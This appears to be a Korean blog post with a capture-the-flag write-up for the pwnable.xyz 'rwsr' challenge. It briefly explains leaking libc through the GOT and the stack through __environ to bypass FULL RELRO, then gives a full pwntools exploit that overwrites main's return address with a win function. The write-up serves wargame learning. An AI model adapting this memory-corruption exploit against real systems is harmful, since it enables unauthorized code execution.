메모리 릭하고 aaw가 가능하다
FULL RELRO가 걸려있어서 environ을 통해 스택을 릭해서 ret주소에 win을 넣거나 rtld 사용하는 방법으로 생각했다
로컬에서는 익스가 안되서 왜 이러나 싶었는데 그냥 리모트로 날려보니까 익스가 됐다
from pwn import *
context.log_level = "debug"
p = remote("svc.pwnable.xyz", 30019)
#p = process("./rwsr", env={"LD_PRELOAD" : "./alpine-libc-2.28.so"})
libc = ELF("./alpine-libc-2.28.so")
#gdb.attach(p)
def read(addr):
p.recvuntil(b"> ")
p.sendline(b"1")
p.recvuntil(b"Addr: ")
p.sendline(str(addr))
def write(addr, val):
p.recvuntil(b"> ")
p.sendline(b"2")
p.recvuntil(b"Addr: ")
p.sendline(str(addr))
p.recvuntil(b"Value: ")
p.sendline(str(val))
read_got = 0x600fc8
win = 0x400909
read(read_got)
read_leak = p.recv(6)
read_leak += b"\x00\x00"
read_leak = u64(read_leak)
libc_base = read_leak - libc.symbols['read']
environ = libc_base + libc.symbols['__environ']
read(environ)
stack_leak = p.recv(6)
stack_leak += b"\x00\x00"
stack_leak = u64(stack_leak)
main_ret = stack_leak - 0xf0
log.info("read: " + hex(read_leak))
log.info("libc base: "+ hex(libc_base))
log.info("environ: " + hex(environ))
log.info("leak stack: " + hex(stack_leak))
log.info("main_ret: " + hex(main_ret))
write(main_ret, win)
p.recvuntil(b"> ")
p.sendline(b"0")
p.interactive()'pwn > pwnable.xyz' 카테고리의 다른 글
| pwnable.xyz / bookmark (0) | 2022.05.21 |
|---|---|
| pwnable.xyz / attack (0) | 2022.05.21 |
| pwnable.xyz / message (0) | 2022.05.20 |
| pwnable.xyz / UAF (0) | 2022.05.19 |
| pwnable.xyz / iape (0) | 2022.05.19 |
